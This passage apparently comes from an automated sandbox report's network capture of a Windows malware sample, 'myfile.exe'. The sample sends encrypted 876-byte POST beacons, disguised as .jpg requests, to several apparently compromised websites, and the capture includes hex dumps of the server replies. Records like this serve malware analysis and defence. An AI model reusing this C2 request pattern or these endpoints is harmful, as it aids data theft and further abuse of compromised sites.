                                                              2024-09-09 10:07:25 UTC1369INData Raw: 35 2c 32 30 33 29 20 30 25 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25 2c 72 67 62 28 35 31 2c 31 36 37 2c 31 38 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d
                                                              Data Ascii: 5,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);-
                                                              2024-09-09 10:07:25 UTC1369INData Raw: 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74 65 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 31 2e 32 35 65 6d 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75
                                                              Data Ascii: where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-blu


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              17192.168.2.44975495.130.22.1084437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:25 UTC268OUTPOST /admin/graphic/qhok.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: mursall.de
                                                              2024-09-09 10:07:25 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:27 UTC1007INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Sep 2024 10:07:27 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Powered-By: PHP/8.2.23
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              x-frame-options: deny
                                                              x-xss-protection: 1; mode=block
                                                              x-content-type-options: nosniff
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              referrer-policy: no-referrer
                                                              permissions-policy: accelerometer=(); ambient-light-sensor=(); autoplay=(self); camera=(); encrypted-media=(); fullscreen; geolocation=(self); gyroscope=(); magnetometer=(); microphone=(); midi=(); payment=(); picture-in-picture=(self); speaker=(); usb=(); vr=()
                                                              content-security-policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' https: data: *.mursall.de;
                                                              WPO-Cache-Status: not cached
                                                              WPO-Cache-Message: The request method was not GET (POST)
                                                              Link: <https://mursall.de/wp-json/>; rel="https://api.w.org/"
                                                              Vary: Accept-Encoding
                                                              2024-09-09 10:07:27 UTC15377INData Raw: 31 63 32 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e
                                                              Data Ascii: 1c2c<!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="de-DE" class="no-js">...<![endif]--><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0">


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              18192.168.2.449756188.114.96.34437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:28 UTC277OUTPOST /include/tmp/vzac.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: testitjavertailut.net
                                                              2024-09-09 10:07:28 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:29 UTC665INHTTP/1.1 301 Moved Permanently
                                                              Date: Mon, 09 Sep 2024 10:07:29 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 167
                                                              Connection: close
                                                              Cache-Control: max-age=3600
                                                              Expires: Mon, 09 Sep 2024 11:07:29 GMT
                                                              Location: https://princebet88.site/
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T2nAcf%2BrQU2EZgCbU92nK8gvhuL31Qho01XGTIt%2BL%2BKVqHnVL%2BkYtNY794Co37BkAJI235Ho8mTlvJKUPPluPQ5VXn%2F41QYrp2UfQjpG1WyQ4yiXuc%2FG%2B%2FUxM1utT3XelWm6uSe6pO8%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c065f1eba8d726e-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-09-09 10:07:29 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              19192.168.2.449757172.67.158.624437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:29 UTC190OUTGET / HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Host: princebet88.site
                                                              2024-09-09 10:07:30 UTC661INHTTP/1.1 200 OK
                                                              Date: Mon, 09 Sep 2024 10:07:30 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              last-modified: Thu, 25 Apr 2024 18:01:22 GMT
                                                              vary: Accept-Encoding
                                                              x-turbo-charged-by: LiteSpeed
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hCHCXFiK%2BThuDc11%2BVhGhKNX%2BkyHtpK4MvPY%2B97Z5gxUxIbCevZELrg8ah2qfnSzns5MHV7jA0EsNh5f1CHGSXeZIacNfI3E3%2FC38iPX3ZSQu2G0Q5hQpncSOlEiqvGvRYnX"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c065f22acc5190e-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              2024-09-09 10:07:30 UTC708INData Raw: 37 64 31 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 20 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63
                                                              Data Ascii: 7d1b<!doctype html><html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" lang="en-US" > <head><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="viewport" content="width=devic
                                                              2024-09-09 10:07:30 UTC1369INData Raw: 22 70 72 69 6e 63 65 62 65 74 38 38 2c 20 70 72 69 6e 63 65 62 65 74 38 38 20 6c 6f 67 69 6e 2c 20 70 72 69 6e 63 65 62 65 74 38 38 20 73 6c 6f 74 2c 20 70 72 69 6e 63 65 62 65 74 38 38 20 73 6c 6f 74 20 6c 6f 67 69 6e 2c 20 6c 69 6e 6b 20 61 6c 74 65 72 6e 61 74 69 66 20 70 72 69 6e 63 65 62 65 74 38 38 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 41 63 63 65 70 74 2d 43 48 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 72 69 6e 63 65 62 65 74 38 38
                                                              Data Ascii: "princebet88, princebet88 login, princebet88 slot, princebet88 slot login, link alternatif princebet88"><meta http-equiv="Accept-CH" content="Sec-CH-UA-Platform-Version, Sec-CH-UA-Model" /><link rel="icon" type="image/x-icon" href="https://princebet88
                                                              2024-09-09 10:07:30 UTC1369INData Raw: 3a 6f 72 69 67 69 6e 61 6c 5f 70 72 69 63 65 3a 63 75 72 72 65 6e 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 49 44 52 22 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 70 72 6f 64 75 63 74 3a 73 61 6c 65 5f 70 72 69 63 65 3a 61 6d 6f 75 6e 74 22 20 63 6f 6e 74 65 6e 74 3d 22 31 30 30 30 30 2e 30 30 22 2f 3e 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 70 72 6f 64 75 63 74 3a 73 61 6c 65 5f 70 72 69 63 65 3a 63 75 72 72 65 6e 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 49 44 52 22 2f 3e 0d 0a 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 52 49 4e 43 45 42 45 54 38 38 20 23 20 53 65 6c 61 6d 61 74 20 44 61 74 61 6e 67 20 64 69 20 53 69 74 75 73 20 47 61 6d 69 6e 67 20 4f 6e 6c 69 6e 65 20 50 72
                                                              Data Ascii: :original_price:currency" content="IDR"/><meta property="product:sale_price:amount" content="10000.00"/><meta property="product:sale_price:currency" content="IDR"/><meta itemprop="name" content="PRINCEBET88 # Selamat Datang di Situs Gaming Online Pr
                                                              2024-09-09 10:07:30 UTC1369INData Raw: 61 2e 22 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 73 2e 73 71 75 61 72 65 73 70 61 63 65 2d 63 64 6e 2e 63 6f 6d 22 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 69 6b 2f 6b 38 68 66 4c 37 6b 5a 7a 33 51 73 47 45 69 55 77 46 36 4d 33 52 58 44 4d 55 51 48 43 6c 68 42 59 6f 38 64 78 44 30 59 70 59 77 66 65 31 74 4a 58 6e 58 31 49 79 76 68 46 32 6a 74 46 52 5a 4c 46 52 6d 38 6a 44 6d 38 6a 52 53 33 6a 68 34 52 46 51 4a 68 77 32 6a 6b 6a 51 73 79 5a 52 4a 61 65 36 4d 4b 67 63 69 7a 53 65 79 38 53 4b 47 48 66 4f 31 6d 4d 79 4d 4d 65 4d 62 36
                                                              Data Ascii: a."/><link rel="preconnect" href="https://images.squarespace-cdn.com"><script type="text/javascript" src="//use.typekit.net/ik/k8hfL7kZz3QsGEiUwF6M3RXDMUQHClhBYo8dxD0YpYwfe1tJXnX1IyvhF2jtFRZLFRm8jDm8jRS3jh4RFQJhw2jkjQsyZRJae6MKgcizSey8SKGHfO1mMyMMeMb6
                                                              2024-09-09 10:07:30 UTC1369INData Raw: 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 63 72 69 70 74 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 65 78 74 72 61 63 74 2d 63 73 73 2d 6d 6f 6d 65 6e 74 2d 6a 73 2d 76 65 6e 64 6f 72 2d 36 66 31 31 37 64 62 34 65 62 37 66 64 34 33 39 32 33 37 35 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 6a 73 22 5d 3b 20 7d 29 28 53 51 55 41 52 45 53 50 41 43 45 5f 52 4f 4c 4c 55 50 53 2c 20 27 73 71 75 61 72 65 73 70 61 63 65 2d 65 78 74 72 61 63 74 5f 63 73 73 5f 6d 6f 6d 65 6e 74 5f 6a 73 5f 76 65 6e 64 6f 72 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 73 72 63 3d 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 63 72 69 70 74 73
                                                              Data Ascii: m/universal/scripts-compressed/extract-css-moment-js-vendor-6f117db4eb7fd4392375-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-extract_css_moment_js_vendor');</script><script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts
                                                              2024-09-09 10:07:30 UTC1369INData Raw: 6c 2f 73 63 72 69 70 74 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 63 6f 6d 6d 6f 6e 2d 76 65 6e 64 6f 72 73 2d 39 32 38 37 32 34 66 65 30 33 31 30 33 64 35 31 31 37 31 65 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 6a 73 22 5d 3b 20 7d 29 28 53 51 55 41 52 45 53 50 41 43 45 5f 52 4f 4c 4c 55 50 53 2c 20 27 73 71 75 61 72 65 73 70 61 63 65 2d 63 6f 6d 6d 6f 6e 5f 76 65 6e 64 6f 72 73 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 73 72 63 3d 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 63 72 69 70 74 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 63 6f 6d 6d 6f 6e 2d 76 65 6e 64 6f 72 73 2d 39 32 38 37 32 34 66 65 30 33 31
                                                              Data Ascii: l/scripts-compressed/common-vendors-928724fe03103d51171e-min.en-US.js"]; })(SQUARESPACE_ROLLUPS, 'squarespace-common_vendors');</script><script crossorigin="anonymous" src="//assets.squarespace.com/universal/scripts-compressed/common-vendors-928724fe031
                                                              2024-09-09 10:07:30 UTC1369INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 74 79 6c 65 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 63 6f 6d 6d 65 72 63 65 2d 32 61 66 30 36 66 37 39 34 38 64 62 35 34 37 37 64 38 66 35 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 63 73 73 22 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 72 6f 6c 6c 75 70 73 2c 20 6e 61 6d 65 29 20 7b 20 69 66 20 28 21 72 6f 6c 6c 75 70 73 5b 6e 61 6d 65 5d 29 20 7b 20 72 6f 6c 6c 75 70 73 5b 6e 61 6d 65 5d 20 3d 20 7b 7d 3b 20 7d 20 72 6f 6c 6c 75 70 73 5b 6e 61 6d 65 5d 2e 6a 73 20 3d 20 5b 22 2f 2f 61 73 73 65 74 73 2e 73 71 75
                                                              Data Ascii: <link rel="stylesheet" type="text/css" href="//assets.squarespace.com/universal/styles-compressed/commerce-2af06f7948db5477d8f5-min.en-US.css"><script>(function(rollups, name) { if (!rollups[name]) { rollups[name] = {}; } rollups[name].js = ["//assets.squ
                                                              2024-09-09 10:07:30 UTC1369INData Raw: 31 61 34 36 34 35 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 6a 73 22 7d 2c 22 73 71 75 61 72 65 73 70 61 63 65 2d 63 61 6c 65 6e 64 61 72 2d 62 6c 6f 63 6b 2d 72 65 6e 64 65 72 65 72 22 3a 7b 22 63 73 73 22 3a 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 74 79 6c 65 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 63 61 6c 65 6e 64 61 72 2d 62 6c 6f 63 6b 2d 72 65 6e 64 65 72 65 72 2d 30 65 33 36 31 33 39 38 62 37 37 32 33 63 39 64 63 36 33 65 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 63 73 73 22 2c 22 6a 73 22 3a 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 63 72 69 70 74 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 63 61 6c 65 6e 64 61 72 2d 62 6c 6f 63 6b
                                                              Data Ascii: 1a4645-min.en-US.js"},"squarespace-calendar-block-renderer":{"css":"//assets.squarespace.com/universal/styles-compressed/calendar-block-renderer-0e361398b7723c9dc63e-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/calendar-block
                                                              2024-09-09 10:07:30 UTC1369INData Raw: 65 76 65 6e 74 73 2d 63 6f 6c 6c 65 63 74 69 6f 6e 2d 30 65 33 36 31 33 39 38 62 37 37 32 33 63 39 64 63 36 33 65 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 63 73 73 22 2c 22 6a 73 22 3a 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 63 72 69 70 74 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 65 76 65 6e 74 73 2d 63 6f 6c 6c 65 63 74 69 6f 6e 2d 63 37 66 62 31 34 35 65 30 63 65 63 33 33 37 34 31 36 33 65 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 6a 73 22 7d 2c 22 73 71 75 61 72 65 73 70 61 63 65 2d 66 6f 72 6d 2d 72 65 6e 64 65 72 69 6e 67 2d 75 74 69 6c 73 22 3a 7b 22 6a 73 22 3a 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 63 72 69 70 74 73 2d 63 6f
                                                              Data Ascii: events-collection-0e361398b7723c9dc63e-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/events-collection-c7fb145e0cec3374163e-min.en-US.js"},"squarespace-form-rendering-utils":{"js":"//assets.squarespace.com/universal/scripts-co
                                                              2024-09-09 10:07:30 UTC1369INData Raw: 73 61 6c 2f 73 74 79 6c 65 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 70 6f 70 75 70 2d 6f 76 65 72 6c 61 79 2d 62 32 62 66 37 64 66 34 34 30 32 65 32 30 37 63 64 37 32 63 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 63 73 73 22 2c 22 6a 73 22 3a 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73 61 6c 2f 73 63 72 69 70 74 73 2d 63 6f 6d 70 72 65 73 73 65 64 2f 70 6f 70 75 70 2d 6f 76 65 72 6c 61 79 2d 38 62 64 31 63 39 66 35 64 65 37 32 37 38 30 62 65 31 33 36 2d 6d 69 6e 2e 65 6e 2d 55 53 2e 6a 73 22 7d 2c 22 73 71 75 61 72 65 73 70 61 63 65 2d 70 72 6f 64 75 63 74 2d 71 75 69 63 6b 2d 76 69 65 77 22 3a 7b 22 63 73 73 22 3a 22 2f 2f 61 73 73 65 74 73 2e 73 71 75 61 72 65 73 70 61 63 65 2e 63 6f 6d 2f 75 6e 69 76 65 72 73
                                                              Data Ascii: sal/styles-compressed/popup-overlay-b2bf7df4402e207cd72c-min.en-US.css","js":"//assets.squarespace.com/universal/scripts-compressed/popup-overlay-8bd1c9f5de72780be136-min.en-US.js"},"squarespace-product-quick-view":{"css":"//assets.squarespace.com/univers


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              20192.168.2.449758134.209.129.2544437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:31 UTC294OUTPOST /admin/graphic/tajahxayexuseayc.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: vitoriaecoturismo.com.br
